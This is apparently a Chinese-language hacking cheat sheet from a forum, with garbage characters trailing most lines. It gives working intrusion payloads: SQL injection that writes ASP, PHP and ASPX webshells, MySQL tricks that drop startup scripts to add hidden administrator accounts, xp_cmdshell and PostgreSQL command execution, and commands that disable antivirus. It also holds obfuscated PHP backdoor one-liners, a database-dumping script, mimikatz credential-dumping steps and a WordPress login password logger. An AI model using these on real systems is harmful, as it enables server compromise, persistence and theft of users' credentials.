查询sql server 2005中的密码hash" v! K( z2 Q* B! ~% L& y9 S/ X9 ]
SELECT password_hash FROM sys.sql_logins where name='sa'
( s8 \9 g8 x5 OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
7 `5 B( |  ?% y5 waccess中导出shell; |  i# N1 w3 i

% ^" j3 m, d& [/ N) S中文版本操作系统中针对mysql添加用户完整代码:( Z4 x, t- v: S0 b8 ]
; t, T& A# G8 j: J% i
use test;8 J- ]9 e9 R- P1 T) ~
create table a (cmd text);9 r1 F* G9 t# M9 ~* X! Q0 G
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
& l1 R& J% t; m1 ]& f4 @+ j1 @) Pinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& z3 b0 l! ]4 X& S( f
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );" q- q% y8 @8 V: ]0 L/ E+ ~
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
: N+ w5 c8 `* t* h: m0 `drop table a;. g1 D3 N" V* |
! c3 z2 E5 e1 b7 I( P& F' N7 Q0 b
英文版本:* y# K; x; a" C  m# P) m2 F& t
2 I9 h- |/ V7 s: w: _0 f! x3 X* o2 |  s
use test;( t+ R) a# |0 @8 }: q" H) f3 `
create table a (cmd text);
8 }9 o; v5 ~+ a, i3 i' j# @insert into a values ("set wshshell=createobject (""wscript.shell"") " );
3 M8 w, A* z1 A2 S. l* y  zinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; ]  R; Y& o% F& n$ U; B, Zinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
$ _# L) Z& H3 n$ e2 `5 Dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";. w" S  t) |; s+ D; ^
drop table a;
. Y. g0 j9 ^# F1 b; o( H! `. f) B- v4 h: K
create table a (cmd BLOB);
# ~6 F" A/ w+ \' ^6 {insert into a values (CONVERT(木马的16进制代码,CHAR));
( Y- Z! u* h1 w3 a" p: d' gselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'2 ~; e  y" f9 F. C7 v& i, y% j/ k
drop table a;3 _& d9 Q7 @$ k1 L8 D# Q' j
% Q. q3 N( m! [$ e2 m
记录一下怎么处理变态诺顿
: z1 z' d& C3 p/ J3 ?0 m; a查看诺顿服务的路径
1 I, b1 S# T9 n- ^sc qc ccSetMgr
& @! x  l/ O' e* j9 O然后设置权限拒绝访问。做绝一点。。7 S* X! s; O: A& S$ Z, q
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
3 T( b- a( Q) ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"+ b5 k$ o1 z! I
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
& M7 ]0 P% ]+ rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone, H+ w1 D" m) r$ `8 ~
9 I, H/ U9 u3 u8 S
然后再重启服务器6 s6 H3 @3 u' T. m7 s( K
iisreset /reboot
: i3 Z3 \2 `' T$ n7 ]1 C" J这样就搞定了。。不过完事后。记得恢复权限。。。。
) i* d1 q& `; W. A/ V) M6 j7 Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
  y% }& m) `& `! ?3 ]9 F$ H) ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
; p0 d4 {- m/ k! Z! ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F) b* {1 ?  ?  |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
% ?; f9 k6 ^* uSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin# _# x3 V1 O2 g* F2 P& u
8 G: @1 B& u9 _/ [5 l
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
- d0 a, F& o. \) {
# l/ a" p  r) O; z, zpostgresql注射的一些东西$ \  p6 T" R  m  h- R+ L8 z. ~
如何获得webshell
7 \6 W; r7 m/ w) O. F5 C: K; zhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
9 C- l/ M" w: a$ }" W5 rhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); % j( r# ^) {: n, ]( v6 ^: ^$ n* s
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
, A& R1 M; U) y如何读文件
' B! v- ?' G  r7 x  v$ ghttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
& M. w' B. @' v0 ?http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
4 Y9 C4 f+ @& E$ |: yhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
, I* G6 q3 r+ ?+ h8 h: ?
3 K$ J8 p: }) }& f2 Xz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
  Z7 x. C, n$ @当然,这些的postgresql的数据库版本必须大于8.X
# X  n+ Z( L3 ^( p) X" y创建一个system的函数:
1 Y" s- ^# a! H# b0 s2 \CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
: k, i4 Q# s: w, D; i1 L
# s  `* c: M5 ]创建一个输出表:
$ p7 a/ H& d8 m: OCREATE TABLE stdout(id serial, system_out text)- P$ g7 r# ?/ U2 e( b
1 \8 q# y+ I) j6 |$ ?8 W
执行shell,输出到输出表内:
" h2 u  S  B# V+ MSELECT system('uname -a > /tmp/test')7 l& T& g* X8 d3 `$ ~# D% V

/ ?) U! o) N! ~  q' E' P: tcopy 输出的内容到表里面;6 n" _+ j; [9 s3 X7 m3 P3 _% _! {" @1 }
COPY stdout(system_out) FROM '/tmp/test'% V5 v. B$ n1 N2 }, y2 d1 t$ m' m& n
, v$ v( q7 n% s  ~5 A4 c# S
从输出表内读取执行后的回显,判断是否执行成功3 ]1 n2 E8 u% |' y
7 v6 s- Z2 e8 w# V  L, [
SELECT system_out FROM stdout
% U) @, d+ U, n0 i下面是测试例子
2 g7 K4 h9 D4 `; m: T
6 P$ Y1 \+ l3 K) F6 [: K1 t! ~, d/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- % n( A5 s3 d2 x. H2 }
8 C* g1 b5 r) }! h1 X# @
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'1 I, `- L( ^4 t/ k; m
STRICT --
( P4 `% a  a& ?' s
5 X* }: B' F7 I3 X/store.php?id=1; SELECT system('uname -a > /tmp/test') --
0 V& Z9 O2 |2 R  S" [$ h  u
$ @" w" ~( h7 t3 l. B. r' Q/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --3 F6 v6 z" Y' S8 T" o

# r; z# [$ F& X' [/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
& W% p2 o+ U7 G! S% Unet stop sharedaccess    stop the default firewall
5 P) J: B+ B. E: r  ?netsh firewall show      show/config default firewall
6 z% K$ O2 L" q# Bnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall( a/ P/ _8 q  c. b- a5 U
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall+ B% D. A7 }7 p+ n. W. o1 z; r- t
修改3389端口方法(修改后不易被扫出)
2 W6 X  A/ _& E! ^: b修改服务器端的端口设置,注册表有2个地方需要修改
3 M6 s* S6 [2 P! l8 T* S! u9 a2 n
/ i5 X( B( H" f[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]6 Q3 G7 |+ E8 J: y
PortNumber值,默认是3389,修改成所希望的端口,比如6000
1 Z% [. z: n3 m3 O2 w0 v$ h3 ^; s* }! g5 Q
第二个地方:
: v9 x+ H4 b" P# L% y6 u/ f; Q[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) N! t; M: J  M1 A* C/ F
PortNumber值,默认是3389,修改成所希望的端口,比如6000; G) Z0 W  H% r$ N

8 p/ X5 D3 _  {' T现在这样就可以了。重启系统就可以了
: ~# x- s2 E$ ?1 S* R0 X) `
. ?8 @7 E( W+ n8 r/ D$ F# D查看3389远程登录的脚本
2 v% Z  K' Z' E2 q保存为一个bat文件
2 V/ _( t; b$ @% I7 D5 J) `4 edate /t >>D:\sec\TSlog\ts.log. b' G+ r0 X$ r# O# X3 J0 @
time /t >>D:\sec\TSlog\ts.log
( E0 ?0 q5 O3 T8 p% e1 `netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
7 \+ D% [7 m. X7 H% tstart Explorer
8 f! `" Y" l/ C+ q1 B+ }- z4 F( _' T) n* q
mstsc的参数:( c5 [! u' q5 h& ^- P$ [7 J

( b6 S3 C$ C5 |/ ~% O7 s! O; x远程桌面连接
6 B4 t9 [3 e1 L
% V, z8 q8 F6 F/ u& nMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
* I$ }# a: D9 I/ m  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
7 O( E7 h3 j" t* z1 X4 S2 N9 F% [% |  Q
<Connection File> -- 指定连接的 .rdp 文件的名称。
8 x2 i: f# a6 d) G) }( f$ q4 q& E
. t8 j- V# l9 [$ d' f+ H0 a( H/v:<server[:port]> -- 指定要连接到的终端服务器。1 _5 M% l/ ?6 d7 ?+ `

, F3 H/ J5 g- T8 Q/console -- 连接到服务器的控制台会话。
7 M6 J& x; c+ F& F1 E: m
4 c3 _  ^, m, U# b1 G5 N  @* E/f -- 以全屏模式启动客户端。
& X0 x5 R% o: \" E, g9 y" c) q0 y7 v* ^* ]. A
/w:<width> --  指定远程桌面屏幕的宽度。
$ G" t$ K7 C8 x: u2 Q4 d, }! d2 |% e9 x
/h:<height> -- 指定远程桌面屏幕的高度。
2 L! O: o* ]3 X- J' p# m( o" O% _
/edit -- 打开指定的 .rdp 文件来编辑。
' M; o& P  |* K& W
, {% N/ P- d& I* a/migrate -- 将客户端连接管理器创建的旧版1 J& l" g3 K  i$ s7 A/ G4 R( ~
连接文件迁移到新的 .rdp 连接文件。( d1 l; P" K& e: d6 ^

8 Z( P( L! e" ?% @6 M3 ^3 S6 B8 }1 u& T
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就3 Z6 o0 ]+ u: y/ C; c8 D
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
+ [2 a0 o* u( N. W% c. Z8 c7 ?$ B' O# Q7 K- U- v
命令行下开启3389) v0 _* l" J9 U% z" G( L
net user asp.net aspnet /add- x, u: _2 m! X& P# K# P7 W
net localgroup Administrators asp.net /add7 M/ ^3 h  Y1 Z- Y  e0 u5 |% w
net localgroup "Remote Desktop Users" asp.net /add
$ C& S7 `. ]6 R" c! l2 G$ W* e# c0 tattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D# i; I; F  j" x6 Q: V# r
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0" E1 _+ _  h$ |. h" I7 F
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
+ l9 w# N) G! g0 w1 t. V8 I0 m$ o! pecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 K1 [* i) P7 @3 E0 ^$ csc config rasman start= auto
' @9 k1 x' f2 m, }! bsc config remoteaccess start= auto4 R) s+ ?# X& y" `% r6 R% F
net start rasman
  t" I6 ]. [' q/ M' f9 r. ]net start remoteaccess% ?  b2 I) D: x( U( }
Media  g, O( z  e' |2 j; x) o% r5 J) `7 x
<form id="frmUpload" enctype="multipart/form-data"+ J* O6 X1 k0 r7 d; Z' \- C9 B
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
6 Q' e4 F( o# U+ z<input type="file" name="NewFile" size="50"><br>) j! O0 w; }+ H4 c
<input id="btnUpload" type="submit" value="Upload">1 @( O9 R1 p* c% W- |/ H6 n
</form>0 J* E$ i: r) ^+ }" n9 E5 v4 B
- H, r. y1 n9 v3 U1 b1 n; S
control userpasswords2 查看用户的密码) D  I! a( e# R/ s3 N
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
1 m& k9 N" H, }+ h9 ]& ~$ OSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a0 y% r( p* F# }$ B- R8 v- a1 X9 E3 z3 e

( S: E  j  W0 w% a* `4 Z141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
) ?1 m1 m3 a0 F. {$ L测试1:
9 H% @2 E. h$ J/ f- D7 n' eSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1' g9 _: @, K& a' ^" B

3 j) ~4 _. p% `6 ?# j: H2 T3 z测试2:
0 d' ?# T6 F4 r; `
2 o- f0 o1 A* ]: D/ Qcreate table dirs(paths varchar(100),paths1 varchar(100), id int)  S5 _* y; c/ |3 O
% o2 r7 c+ s  x8 }
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
8 D- ~- t* D+ i8 y* z5 H# ?; t- Q" x0 a- @& Z
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t14 s( Z* m& V& K6 y3 @$ C% c, @
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令# f/ }# A  @. u
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;+ k% g" Y! L: P0 w( x5 ]8 U
net stop mcafeeframework& y' ]7 [% ^- z5 c: N4 a
net stop mcshield
/ p7 l+ M9 @/ Cnet stop mcafeeengineservice
3 O4 x( }* z/ W/ B  l. L% g  v  F7 Fnet stop mctaskmanager
( J) |4 p6 U, _! zhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
' h! u; N9 {  v# S2 O" J' \. X4 Q4 ?$ A( r% m
  VNCDump.zip (4.76 KB, 下载次数: 1)
6 N; b0 {  B4 J密码在线破解http://tools88.com/safe/vnc.php! R$ Z& c6 t) A2 u! U
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取- I$ A$ o/ @% E- p# {

* |' |  O: @- |9 h$ I3 Zexec master..xp_cmdshell 'net user'
8 ]" G  Q3 S0 \; |/ ^" \+ Imssql执行命令。
+ J, T( j- b  s% e# W获取mssql的密码hash查询
0 H) B* u, B9 W/ i& ?select name,password from master.dbo.sysxlogins
  m! f1 }. ~2 p/ U3 L
) |% a. G7 g8 m6 Fbackup log dbName with NO_LOG;
7 z3 @7 k: o& e) }backup log dbName with TRUNCATE_ONLY;
  W$ m5 o2 J7 zDBCC SHRINKDATABASE(dbName);
! y$ V1 P  H% Vmssql数据库压缩
, V& r' ?" N( G: a- T) G+ u# H
1 {: [2 N  _8 f! v7 K: X$ kRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! R9 x$ n0 ?) f1 |3 H8 K/ S
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
0 L9 z) A% W+ n; {1 O$ D' s9 j) i  f" U. C
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
0 h9 m! Z, y6 l9 y; ?# k: u备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak# C7 K6 B0 z+ q4 I) u7 i* m
" i% @- H/ S& @$ S5 d
Discuz!nt35渗透要点:
- v! j& ?" U7 B" U( q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
- k& D8 u& Q) h$ n% i, e' \+ B  `(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>3 J* k$ n/ P8 z
(3)保存。$ F  |7 @, {; m& L+ F/ l- v* ^( A+ m9 }
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass6 Z. V( D5 z& \% p2 u2 R' T, R
d:\rar.exe a -r d:\1.rar d:\website\- ]( B' [8 g/ A' S( o
递归压缩website; T$ N0 E' }1 @7 o# X, r
注意rar.exe的路径
! p' |5 z" Y- s9 b
# n& O5 _( @/ d3 [<?php
6 S- B+ P7 j& [2 p6 T* \* ~. g! P* {) T& O0 J+ W/ ^8 g
$telok   = "0${@eval($_POST[xxoo])}";
! Y' P1 ?( l* r3 u3 M  W" N1 U7 O; k
$username   = "123456";: Z+ m# g# N( U: F5 n5 l

" w( P0 z% \1 G& s$userpwd   = "123456";
4 R8 {4 o' G) u2 x0 l0 D3 C0 e! z
0 ]% p5 L8 W& |5 |$ n& [6 R$telhao   = "123456";
- N4 w, G/ H' H+ F
: z# P- z) J: J( E0 z3 y' i4 O$telinfo   = "123456";: v( [7 D0 P) J) J
1 K2 i! O$ v6 @; @) f
?>7 }) u) u  |$ B' `, Y- z7 e8 a
php一句话未过滤插入一句话木马- m3 l, x- B+ |, e8 f- L1 H/ k

+ u' R: @9 X/ j$ {+ P0 g: N0 c站库分离脱裤技巧) q1 o5 X+ E1 \  P0 _
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
3 F/ c. ~! T: k( N" Texec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'; k) V; t) o8 G: X* c
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。; h- e4 O3 [) A6 `, L6 X% G9 n7 L
这儿利用的是马儿的专家模式(自己写代码)。
- |7 V! L1 I. Z  `ini_set('display_errors', 1);1 ?3 k) F5 o$ V' F
set_time_limit(0);
/ G+ C4 |; w( u! P0 ~- ?# w6 }error_reporting(E_ALL);5 j4 P8 U$ Q+ w. K! l( x
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
  c6 `1 A" A% x1 w4 imysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());" z4 g7 h( G: w: A
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
4 c) m, ?* d! }- g- ?% R$i = 0;
8 K* n) z% Q# b- ?$tmp = '';
- A/ t( `: @# e& `( h- V9 b) Y! ]while ($row = mysql_fetch_array($result, MYSQL_NUM)) {) w+ ^  a3 c" R" u9 i
    $i = $i+1;
1 r0 ]. u8 M' n5 s' l: k+ A% F    $tmp .=  implode("::", $row)."\n";
5 U3 C+ N/ e3 X% F! K    if(!($i%500)){//500条写入一个文件2 i/ J7 J1 D. F
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
0 ?! w4 P0 N( h) G( A. F        file_put_contents($filename,$tmp);
/ f# J" ]2 [; r        $tmp = '';9 n7 \7 \4 s  d; G
    }4 E$ E/ g  s4 O: u( \: X$ \
}, M- z$ e5 i6 T( n0 H& Z- v
mysql_free_result($result);1 f6 p* @' C7 u
, N, o0 o/ s( e2 s  E
" D8 S' |6 \2 E+ h# J' e
5 h; A% F1 R' ~2 w
//down完后delete
$ x/ Y+ X, [5 u$ N/ q* ~- j: t  W% P7 R5 P7 a0 V; g

  S6 N) N3 [8 B- D( Uini_set('display_errors', 1);
# [. O8 ^3 B  |! derror_reporting(E_ALL);& J) |! p5 J* b% q9 j5 Y
$i = 0;& C& _# q  |4 U% S4 P
while($i<32) {
4 U2 f2 E4 l  ]& e3 F) [  {4 F9 u' i    $i = $i+1;* W& d' C; [. j4 y8 _0 Y- o
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, R& `) F& ~$ J6 z6 ]0 J        unlink($filename);
5 c9 _% A8 m* E* [}
$ a' s1 m, t& y0 l4 ^- O2 vhttprint 收集操作系统指纹
, O2 g" F+ j5 e4 v1 K2 e* J扫描192.168.1.100的所有端口
  a) c6 d% L4 h! u' wnmap –PN –sT –sV –p0-65535 192.168.1.1003 q  G/ i7 \& c
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
3 ?9 _' v7 J9 r4 ?. Bhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输& D% U& [' s4 }5 O5 ]
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host! E8 {# ^$ P+ ^8 J! C+ Q) e9 U
8 H( U2 u/ _; o
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 E$ j- \! H) Y' l* u& J! J' z0 V9 n1 D! c: x% W$ E4 y* v
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)2 D* d0 Y2 S( r- a. O3 x
( n; h1 v1 X' h
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x- z* D& E( w) q; J
4 N) X: t: B" v
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)! k; F- L3 n- u+ X

" [, Z  i' b+ m5 R1 X& E3 o  http://net-square.com/msnpawn/index.shtml (要求安装). T8 ^: y# N1 i7 ]# }: ^; K
0 t) n) n& a2 G# p9 u- x
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的), V  {+ S. L( [- K  z
' v. n4 {6 L6 k
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
, F- k& ~: G! J1 g3 Dset names gb2312
' K  l3 ]  p/ D' T; r! \- [导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
6 g/ r" E: O5 q# w3 R
6 R- n* r$ h2 o* _' Cmysql 密码修改% X6 Q8 t. u" ^+ R( o9 J7 c
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” , K4 [! U8 t- s3 ~) t" K
update user set password=PASSWORD('antian365.com') where user='root';
4 Z& t, N3 K- M% F! n5 \flush privileges;6 t/ a$ G, b% b1 G
高级的PHP一句话木马后门
6 k, \. {7 F' B4 B* s. a8 w9 ]9 s) }; M$ Y3 n" M
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
2 @4 `7 v' e' T9 b) D7 q$ @+ F; G% R/ f$ X3 I7 b
1、
% L& J9 W/ q( i/ G- ]0 J" c" x7 l7 T( Y% o
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
% G* @( m) H/ L/ s/ ]: L+ s3 T1 N7 B3 s2 ~% F" |
$hh("/[discuz]/e",$_POST['h'],"Access");/ k2 v& K0 _1 b. s( N, _5 C
( U+ I& ~4 ~9 R) ?2 o- U7 h
//菜刀一句话. i; h' g4 [7 P& U- O0 s
* S4 C+ J( ?$ c" V' V( h1 Q
2、  {% l: O" i: {/ l! h

4 U/ v: ^  s' y) T# Y  a$filename=$_GET['xbid'];
+ f9 C" @" P+ n7 N. n9 u4 N2 {; l1 U$ k. @' Y
include ($filename);
+ Q' Z3 ^. X) I
+ a  |( W! d! M& ^//危险的include函数,直接编译任何文件为php格式运行: m4 B: n9 T( h
( C4 U$ b# B! y1 ^: [
3、9 \% Q9 Y* g$ j+ a1 o& @, a+ U

( l! p' L. J) Y0 D: a$reg="c"."o"."p"."y";8 R# @9 `, T8 B0 |" M3 O- ~5 f
, w+ _3 q  ~0 M) I7 z, v
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
8 Y9 P' R/ M% a0 ]/ l4 K) g. U& D" U
//重命名任何文件
" ~" o7 C) u+ V" `4 _. w; }4 {
1 D2 @. N9 `" j4、8 ?$ P' R4 P. Z0 U( p

, n7 P; s* Y7 ]! T- a, O. t$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";# p* }* m8 a4 W" Q7 C) ]

8 f$ x6 l& o) B# S1 \$gzid("/[discuz]/e",$_POST['h'],"Access");6 e* b' v) }6 ]: ~- C

$ a/ f% W+ T/ g4 T) t//菜刀一句话5 R9 g4 \+ v& k* b# Z5 {" d6 L
3 t* I- I8 @* N6 V
5、include ($uid);
- ~; ~2 \6 `. T2 L4 M6 A& k" W$ v
/ S% N6 h, I, W' A//危险的include函数,直接编译任何文件为php格式运行,POST
% V( L1 F0 Y" ?
; ?; Z% ~0 K7 w, k0 D; Y$ f4 S1 r& L
//gif插一句话7 a. N) h5 V6 |) h+ a5 Y

3 S. K2 A& p8 S# _  _: _6、典型一句话, Z* L& O+ X/ w8 w
1 E, q; h* p& Y0 z7 ?
程序后门代码$ y; Q. \) x0 |  F3 z& d
<?php eval_r($_POST[sb])?>4 W. l* @" v- B$ |) u6 h. S
程序代码8 O/ M5 C& [) X5 |# v( d$ L
<?php @eval_r($_POST[sb])?>
* n. A6 L3 h) G( d! ]//容错代码
6 R2 J' s6 M6 K程序代码
( Q0 y6 f1 `0 _9 o' I<?php assert($_POST[sb]);?>! Y2 l# @4 w( o9 u7 F" O' W
//使用lanker一句话客户端的专家模式执行相关的php语句3 o* _& e/ a- ^5 N
程序代码
% Q5 B, T8 O; q+ W0 x, w' p+ N: L<?$_POST['sa']($_POST['sb']);?>* \, Z0 _" Z: q' E5 b' N' J
程序代码! D/ }6 M& I/ u$ ^6 {+ |
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
- ?; ^1 K$ Q1 B2 u+ V5 E5 i9 X! e程序代码
$ i4 A' S% H9 d' u" }* u/ R<?php
+ R1 _, l; {4 |. \0 b5 z/ q@preg_replace("/[email]/e",$_POST['h'],"error");
: O; e. A, _' [" o. I9 w; F1 _: Y7 Z?>
" ]7 k, T5 i: l//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
/ t$ Y; Z7 W  [$ W& |. Z程序代码3 i4 S! C, h2 \# ^# w6 }
<O>h=@eval_r($_POST[c]);</O>, d- S( E% A; P. v" d
程序代码$ r0 [. d4 l5 w5 l1 X, [5 k3 B
<script language="php">@eval_r($_POST[sb])</script>! S; t, Z0 l* L
//绕过<?限制的一句话
8 s' \6 r0 L+ `. u7 o
" L, [9 Q( W( R# d' ?! j' v6 Bhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip' y$ s& X0 h9 [- K7 Y
详细用法:: r2 R/ V% t1 m# e" S+ e
1、到tools目录。psexec \\127.0.0.1 cmd9 z* ?( t$ t  Z* J: u# j9 z
2、执行mimikatz
# ~, p- D' d0 s$ O  T1 q, U3、执行 privilege::debug
  W4 g! ^; X: N# ]' C4 t4、执行 inject::process lsass.exe sekurlsa.dll# g5 g& d: g! A, t7 Q* T
5、执行@getLogonPasswords
: B5 e9 |1 M' x, x6、widget就是密码
2 }( @5 R, L. T' \! x7、exit退出,不要直接关闭否则系统会崩溃。5 `( x0 m$ B1 p" P- t" @& N- E* }
" [' d* J$ \* G( w: n2 n
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
4 }, a5 F; }* g
  @- f3 u5 |( `, G; K2 u自动查找系统高危补丁
  S& q' z5 h) ~# g' P; J* qsysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
4 P, a) ~8 p2 s: b: e: [" f* f% u) w
突破安全狗的一句话aspx后门. i6 {0 V/ c5 M) P4 J9 H4 S* u
<%@ Page Language="C#" ValidateRequest="false" %>4 k" n& p" S9 w% N& g2 h
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
. f7 g1 U; y- V) bwebshell下记录WordPress登陆密码( P6 w6 Q% O& ?+ v1 r' W5 r: ^- F
webshell下记录Wordpress登陆密码方便进一步社工9 R( d+ j) A3 \% c
在文件wp-login.php中539行处添加:& V  h, W5 @1 J6 \2 x5 ?
// log password% _& `1 X0 _2 H; n
$log_user=$_POST['log'];
2 v$ a* k/ V) \( U' }$log_pwd=$_POST['pwd'];+ D- v/ {$ I+ e; n
$log_ip=$_SERVER["REMOTE_ADDR"];( b' ~( ]0 a: l5 s5 e7 |
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
- P9 y3 i" ?1 V" T4 k$txt=$txt.”\r\n”;/ Z. Z/ `1 y1 B8 b; D' V
if($log_user&&$log_pwd&&$log_ip){0 r- n2 V1 v- L! h$ X
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);5 j8 b$ }+ V& X6 f* t" \# \4 K4 U
